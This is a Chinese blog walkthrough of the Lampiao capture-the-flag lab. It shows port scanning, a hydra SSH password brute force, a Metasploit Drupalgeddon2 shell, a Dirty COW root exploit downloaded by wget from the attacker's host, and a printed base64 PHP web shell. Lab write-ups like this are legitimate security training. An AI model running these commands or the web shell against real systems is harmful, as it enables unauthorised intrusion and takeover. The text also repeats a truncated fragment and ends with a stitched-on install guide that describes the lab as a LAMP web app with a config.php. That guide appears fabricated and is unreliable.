2-Lampiao

Lampiao

该文章参考大余每日一攻防

1.nmap信息收集

└─$ nmap  192.168.225.138 -p-
22/tcp   open  ssh
80/tcp   open  http
1898/tcp open  cymtec-port

2.网页信息枚举?q=node/2发现audio.m4a获得用户名

3.御剑遍历目录

在robots.txt中的CHANGELOG.txt文件发现cns版本为Drupal 7.54。

4.获得密码字典

使用 cewl http://192.168.225.138:1898/?q=node/1 -w lampiao.txt

5.hydra爆破获得密码

hydra -l tiago -P lampiao.txt 192.168.225.138 ssh
host: 192.168.225.138 login: tiago password: Virgulino

6.登录后发现低权限

ssh tiago@192.168.225.138

7.mfs-getshell

搜索关于Drupal 7.54 的利用
msfconsole
search Drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 192.168.225.138
set rpost 1898
run
shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’

8.脏牛漏洞提权

searchsploit dirty
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /home/kali/Desktop
主机搭建 :python3 -m http.server 8081
靶机下载 :wget http://192.168.225.129:8081/40847.cpp
编译执行:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dirty 40847.cpp -lutil
获得密码:Root password is: dirtyCowFun
登录cat ./flag.txt 获得密码:9740616875908d91ddcdaa8aea3af366

9.xray扫描结果获得poc、

给出了两个poc链接,下载后安装执行

sudo gem install highline
./drupalgeddon2.rb http://10.211.55.9:1898/
{
  "create_time": 1737269816952,
  "detail": {
    "addr": "http://192.168.225.138:1898/",
    "payload": "",
    "extra": {
      "links": [
        "https://github.com/dreadlocked/Drupalgeddon2", poc链接
        "https://paper.seebug.org/567/"
      ],
      "param": {}
    }
  },
  "plugin": "poc-yaml-drupal-cve-2018-7600-rce",
  "target": {
    "url": "http://192.168.225.138:1898/"
  },
  "id": 0
}

通过base64方法上传shell.php成功获得shell!

*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------

10.漏洞总结

CVE-2018-7600
Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。
Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。以下版本受到影响:Drupal 7.58之前版本,8.3.9之前的8.x版本,8.4.6之前的8.4.x版本,8.5.1之前的8.5.x版本。


CVE-2016-5195 脏牛漏洞
Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
Linux kernel 2.x至4.8.3之前的4.x版本中的mm/gup.c文件存在竞争条件问题漏洞,该漏洞源于程序没有正确处理copy-on-write(COW)功能写入只读内存映射。本地攻击者可利用该漏洞获取权限。

.3之前的4.x版本中的mm/gup.c文件存在竞争条件问题漏洞,该漏洞源于程序没有正确处理copy-on-write(COW)功能写入只读内存映射。本地攻击者可利用该漏洞获取权限。
``

为了安装Lampiao靶机,您可以按照以下步骤进行操作: 1. 首先,您需要准备一个基于Linux的操作系统,比如Ubuntu或者Kali Linux。 2. 在您选择的操作系统上安装Apache服务器、MySQL数据库和PHP解释器,这就是所谓的LAMP堆栈。 - 对于Ubuntu,您可以使用以下命令安装LAMP堆栈: ``` sudo apt update sudo apt install apache2 mysql-server php libapache2-mod-php php-mysql ``` - 对于Kali Linux,您可以使用以下命令安装LAMP堆栈: ``` sudo apt update sudo apt install apache2 mariadb-server php libapache2-mod-php php-mysql ``` 3. 安装完成后,您需要下载Lampiao靶机的源代码。您可以在Lampiao的GitHub存储库上找到源代码:https://github.com/felipefacundes/lampiao 4. 解压下载的源代码包,并将其复制到Apache服务器的网页根目录下,默认情况下是`/var/www/html/`。 5. 接下来,您需要创建一个MySQL数据库并导入Lampiao的数据。进入MySQL命令行界面并执行以下命令: - 创建数据库: ``` CREATE DATABASE lampiao; ``` - 导入数据: ``` USE lampiao; SOURCE /path/to/lampiao.sql; ``` 将`/path/to/lampiao.sql`替换为实际的lampiao.sql文件路径。 6. 配置Lampiao的数据库连接。编辑Lampiao源代码中的`config.php`文件,并根据您的MySQL配置进行相应的更改。 7. 最后,启动Apache服务器并访问Lampiao靶机。在浏览器中输入服务器的IP地址或域名,您应该能够看到Lampiao的登录页面。 请注意,Lampiao是一个漏洞靶场,仅供学习和研究目的使用。在安装和使用Lampiao时,请确保您遵守当地法律和道德准则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值